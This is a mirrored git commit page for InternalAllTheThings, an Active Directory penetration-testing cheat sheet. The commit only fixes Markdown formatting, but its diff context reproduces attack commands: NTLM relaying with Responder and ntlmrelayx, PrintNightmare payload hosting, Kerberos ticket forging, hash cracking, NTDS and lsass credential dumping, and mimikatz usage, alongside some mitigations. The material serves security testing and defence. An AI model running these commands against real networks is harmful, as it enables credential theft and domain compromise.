swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

FIX - Fixing new lines (* and - )

pull/4/head
Swissky 2024-01-12 20:51:55 +01:00
parent dc9a898d55
commit 68d08f6e05
12 changed files with 61 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
docs/active-directory/CVE/NoPAC.md
View File

@ -112,6 +112,7 @@ Automated exploitation:
``` ```
**Mitigations**: **Mitigations**:
* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)

23
docs/active-directory/CVE/PrintNightmare.md
View File

@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
The exploit will execute the DLL either from the local filesystem or a remote share. The exploit will execute the DLL either from the local filesystem or a remote share.
Requirements: Requirements:
* **Spooler Service** enabled (Mandatory) * **Spooler Service** enabled (Mandatory)
* Server with patches < June 2021 * Server with patches < June 2021
* DC with `Pre Windows 2000 Compatibility` group * DC with `Pre Windows 2000 Compatibility` group
@ -14,6 +15,7 @@ Requirements:
**Detect the vulnerability**: **Detect the vulnerability**:
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
```ps1 ```ps1
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
@ -28,20 +30,23 @@ Requirements:
``` ```
**Payload Hosting**: **Payload Hosting**:
* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109):
```ps1 ```ps1
python3 ./smbserver.py share /tmp/smb/ python3 ./smbserver.py share /tmp/smb/
``` ```
* Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): * Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host):
```ps1 ```ps1
Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
``` ```
* Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights):
```ps1 ```ps1
SharpWebServer.exe port=8888 dir=c:\users\public verbose=true SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
``` ```
When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll`
WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
```ps1 ```ps1
cme smb -u user -p password -d domain.local -M webdav [TARGET] cme smb -u user -p password -d domain.local -M webdav [TARGET]
``` ```

6
docs/active-directory/ad-adds-enumerate.md
View File

@ -2,11 +2,14 @@
## Using BloodHound ## Using BloodHound
Use the correct collector Use the correct collector:
* AzureHound for Azure Active Directory * AzureHound for Azure Active Directory
* SharpHound for local Active Directory * SharpHound for local Active Directory
* RustHound for local Active Directory * RustHound for local Active Directory
**Examples**:
* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) * use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) * use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up
``` ```
You can add some custom queries like : You can add some custom queries like :
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) * [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) * [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) * [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)

2
docs/active-directory/ad-adds-ntds-dumping.md
View File

@ -5,6 +5,7 @@ You will need the following files to extract the ntds :
- SYSTEM hive (`C:\Windows\System32\SYSTEM`) - SYSTEM hive (`C:\Windows\System32\SYSTEM`)
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
``` ```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashmob.net](https://hashmob.net) - [hashmob.net](https://hashmob.net)
- [crackstation.net](https://crackstation.net) - [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash) - [hashes.com](https://hashes.com/en/decrypt/hash)

7
docs/active-directory/ad-roasting-asrep.md
View File

@ -3,6 +3,7 @@
> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
**Requirements**: **Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH** * Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux: * Windows/Linux:
```ps1 ```ps1
@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
``` ```
**Mitigations**: **Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
## Kerberoasting w/o domain account ## Kerberoasting w/o domain account
@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w
Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
**Requirements**: **Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH** * Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux: * Windows/Linux:
```ps1 ```ps1
@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
``` ```
* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) * Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
```bash ```bash
user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
``` ```
**Mitigations**: **Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* Disable RC4 cipher if possible. * Disable RC4 cipher if possible.

1
docs/active-directory/ad-roasting-kerberoasting.md
View File

@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
**Mitigations**: **Mitigations**:
* Have a very long password for your accounts with SPNs (> 32 characters) * Have a very long password for your accounts with SPNs (> 32 characters)
* Make sure no users have SPNs * Make sure no users have SPNs

3
docs/active-directory/deployment-sccm.md
View File

@ -67,7 +67,8 @@
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
On the machine. On the machine
* Find SCCM blob * Find SCCM blob
```ps1 ```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"

5
docs/active-directory/hash-capture.md
View File

@ -2,14 +2,16 @@
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens ## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. > Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. :information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
**Requirements**: **Requirements**:
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) * LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
**Exploitation**: **Exploitation**:
* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge * Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
```ps1 ```ps1
HTTPS = On HTTPS = On
@ -68,6 +70,7 @@
* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` * Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
## Capturing and cracking Net-NTLMv2/NTLMv2 hashes ## Capturing and cracking Net-NTLMv2/NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.

25
docs/active-directory/internal-mitm-relay.md
View File

@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets
## LDAP signing not required and LDAP channel binding disabled ## LDAP signing not required and LDAP channel binding disabled
During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
* LDAP signing not required (by default set to `Not required`) * LDAP signing not required (by default set to `Not required`)
* LDAP channel binding is disabled. (by default disabled) * LDAP channel binding is disabled. (by default disabled)
* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
```bash ```bash
# On first terminal # On first terminal
sudo ./Responder.py -I eth0 -wfrd -P -v sudo ./Responder.py -I eth0 -wfrd -P -v
@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
``` ```
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. - Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
```powershell ```powershell
# create a new machine account # create a new machine account
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
## Ghost Potato - CVE-2019-1384 ## Ghost Potato - CVE-2019-1384
Requirements: Requirements:
* User must be a member of the local Administrators group * User must be a member of the local Administrators group
* User must be a member of the Backup Operators group * User must be a member of the Backup Operators group
* Token must be elevated * Token must be elevated
@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
Requirements: Requirements:
- a shell in session 0 (e.g. WinRm shell or SSH shell) - a shell in session 0 (e.g. WinRm shell or SSH shell)
- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) - a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
## DNS Poisonning - Relay delegation with mitm6 ## DNS Poisonning - Relay delegation with mitm6
Requirements: Requirements:
- IPv6 enabled (Windows prefers IPV6 over IPv4) - IPv6 enabled (Windows prefers IPV6 over IPv4)
- LDAP over TLS (LDAPS) - LDAP over TLS (LDAPS)
@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local
> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
**Requirement**: **Requirement**:
* WebClient service * WebClient service
**Exploitation**: **Exploitation**:
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` * Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 * Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` * Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
@ -267,12 +274,16 @@ pyrdp-mitm.py <IP>
pyrdp-mitp.py <IP>:<PORT> # with custom port pyrdp-mitp.py <IP>:<PORT> # with custom port
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
``` ```
* Exploitation
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge **Exploitation**
* If NLA is disabled, you will obtain the password in plaintext
* Other features are available such as keystroke recording * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
* Alternatives * If NLA is disabled, you will obtain the password in plaintext
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener * Other features are available such as keystroke recording
**Alternatives**
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
## References ## References

1
docs/active-directory/kerberos-bronze-bit.md
View File

@ -9,6 +9,7 @@ CVE-2020-17049
:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` :warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
Requirements: Requirements:
* Service account's password hash * Service account's password hash
* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` * Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) * [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013)

8
docs/active-directory/kerberos-tickets.md
View File

@ -111,6 +111,7 @@ Converting kirbi => ccache
Mitigations: Mitigations:
* Hard to detect because they are legit TGT tickets * Hard to detect because they are legit TGT tickets
* Mimikatz generate a golden ticket with a life-span of 10 years * Mimikatz generate a golden ticket with a life-span of 10 years
@ -148,6 +149,7 @@ Interesting services to target with a silver ticket :
Mitigations: Mitigations:
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
@ -155,7 +157,8 @@ Mitigations:
> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
Require: Requirements:
* krbtgt NT Hash * krbtgt NT Hash
* krbtgt AES key * krbtgt AES key
@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR
The goal is to mimic the PAC field as close as possible to a legitimate one. The goal is to mimic the PAC field as close as possible to a legitimate one.
Require: Requirements:
* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
* krbtgt AES key * krbtgt AES key

2
docs/cheatsheets/mimikatz-cheatsheet.md
View File

@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
* Adding requires lock * Adding requires lock
* Removing requires reboot * Removing requires reboot
## LSA Protection Workaround ## LSA Protection Workaround
- LSA as a Protected Process (RunAsPPL) - LSA as a Protected Process (RunAsPPL)
@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
Use the minidump: Use the minidump:
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` * Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
```powershell ```powershell
mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::minidump lsass.dmp